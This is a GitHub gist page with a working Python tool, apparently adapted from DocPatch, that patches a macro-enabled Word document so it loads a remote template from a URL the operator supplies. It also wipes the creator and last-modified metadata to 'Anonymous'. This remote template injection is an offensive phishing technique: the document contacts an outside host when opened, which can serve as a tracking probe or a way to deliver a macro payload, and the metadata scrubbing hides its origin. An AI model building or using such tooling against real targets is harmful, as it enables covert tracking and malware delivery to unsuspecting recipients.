Created
November 20, 2020 07:26
-
-
Save akkuman/bff0535c159afe5d28ac011c03db734a to your computer and use it in GitHub Desktop.
docm远程加载url探针
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import uuid | |
import shutil | |
import zipfile | |
import lxml.etree | |
def inplace_change(filename, old_string, new_string, encoding="utf-8"):
    """Replace every occurrence of a string inside a text file, in place.

    The file is left untouched (not even rewritten) when ``old_string`` does
    not occur in it.

    Args:
        filename: Path of the file to edit.
        old_string: Text to search for.
        new_string: Text that replaces each occurrence of ``old_string``.
        encoding: Text encoding used for both reading and writing. Defaults
            to UTF-8 instead of the platform locale encoding, so the result
            does not depend on the machine the script runs on.
    """
    # newline="" disables newline translation so the original line endings
    # survive the round trip byte-for-byte.
    with open(filename, encoding=encoding, newline="") as f:
        content = f.read()
    if old_string not in content:
        return
    with open(filename, "w", encoding=encoding, newline="") as f:
        f.write(content.replace(old_string, new_string))
def zip_folder(dirpath, zippath):
    """Pack every file found under a folder into a zip archive.

    Args:
        dirpath: Path of the folder whose files are archived.
        zippath: Path of the zip file to create.
    """
    with zipfile.ZipFile(zippath, mode='w') as archive:
        for parent, _subdirs, filenames in os.walk(dirpath):
            for filename in filenames:
                source = os.path.join(parent, filename)
                # Store entries relative to dirpath so the archive mirrors
                # the folder's own hierarchy rather than the absolute path.
                archive.write(source, arcname=os.path.relpath(source, start=dirpath))
def docpatch(document_path: str, url: str, tempdir: str) -> str:
    """Patch a docm file so that it references a remote template at ``url``.

    The document is unpacked into a uniquely named working directory below
    ``tempdir``. ``word/settings.xml`` gets a ``<w:attachedTemplate>`` element,
    ``word/_rels/settings.xml.rels`` is overwritten with a single external
    relationship (``rId1``) targeting ``url``, and the creator, last-modified-by,
    keywords and description fields of ``docProps/core.xml`` are overwritten.
    The result is zipped into a new file and the working directory is removed.

    Args:
        document_path: Path of the docm file to patch.
        url: URL written as the target of the attached-template relationship.
        tempdir: Directory that receives the working directory and the
            patched document.

    Returns:
        Path of the patched document, named ``<uuid><original suffix>`` and
        located in ``tempdir``.

    Raises:
        Exception: Whatever ``zipfile`` raised when the document could not be
            unpacked; it is re-raised after the diagnostic is printed instead
            of letting a later step fail on the missing files.

    References:
        - https://github.com/chrismaddalena/DocPatch
    """
    from xml.sax.saxutils import quoteattr

    uid_name = str(uuid.uuid4())
    work_dir = os.path.join(tempdir, uid_name)
    core_xml_loc = os.path.join(work_dir, 'docProps', 'core.xml')
    settings_file_loc = os.path.join(work_dir, 'word', 'settings.xml')
    rels_file_loc = os.path.join(work_dir, 'word', '_rels', 'settings.xml.rels')
    # quoteattr() escapes &, < and quotes and adds the surrounding quotes, so
    # URLs with query strings still yield well-formed XML.
    rels_value = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        f'Target={quoteattr(url)} TargetMode="External"/></Relationships>'
    )

    # Create the working directory.
    os.makedirs(work_dir, exist_ok=True)
    try:
        # Unpack the document so its XML parts can be edited.
        try:
            with zipfile.ZipFile(document_path, 'r') as zip_handler:
                zip_handler.extractall(work_dir)
        except Exception as e:
            print("[!] Oops! The document could not be unzipped. Are you sure it's a valid macro-enabled Word document?")
            print(f"L.. Details: {str(e)}")
            # Nothing was extracted, so there is nothing to patch.
            raise

        # Reference the template from settings.xml and point relationship
        # rId1 at the URL in settings.xml.rels.
        # NOTE(review): any pre-existing settings.xml.rels content is replaced.
        inplace_change(settings_file_loc, '</w:settings>', '<w:attachedTemplate r:id="rId1"/></w:settings>')
        os.makedirs(os.path.dirname(rels_file_loc), exist_ok=True)
        # The payload declares UTF-8, so write it as UTF-8 regardless of locale.
        with open(rels_file_loc, 'w', encoding='utf-8') as fh:
            fh.write(rels_value)

        # Overwrite the metadata stored in docProps/core.xml.
        dc_ns = {'dc': 'http://purl.org/dc/elements/1.1/'}
        cp_ns = {'cp': 'http://schemas.openxmlformats.org/package/2006/metadata/core-properties'}
        # Name written as both creator and last modifier.
        user_name = "Anonymous"
        tree = lxml.etree.parse(core_xml_loc)
        replacements = (
            ('//dc:creator', dc_ns, user_name),
            ('//cp:lastModifiedBy', cp_ns, user_name),
            ('//cp:keywords', cp_ns, "None"),
            ('//dc:description', dc_ns, "None"),
        )
        for query, namespaces, value in replacements:
            nodes = tree.xpath(query, namespaces=namespaces)
            # Only the first match is updated; absent fields are left absent.
            if nodes:
                nodes[0].text = value
        with open(core_xml_loc, 'wb') as fh:
            fh.write(b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n')
            fh.write(lxml.etree.tostring(tree))

        # Repack the edited tree under the original file extension.
        suffix = os.path.splitext(document_path)[1]
        result_filepath = os.path.join(tempdir, f'{uid_name}{suffix}')
        zip_folder(work_dir, result_filepath)
    finally:
        # Always remove the working directory, including on failure.
        shutil.rmtree(work_dir, ignore_errors=True)
    return result_filepath
if __name__ == "__main__":
    import sys

    # Command line: <docm file> <url to load>. The patched copy is written
    # next to the input document and its path is printed.
    if len(sys.argv) == 3:
        source_doc = os.path.abspath(sys.argv[1])
        remote_url = sys.argv[2]
        print(docpatch(source_doc, remote_url, os.path.dirname(source_doc)))
    else:
        print(f'python {sys.argv[0]} docm文件 加载的url')
        sys.exit(1)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment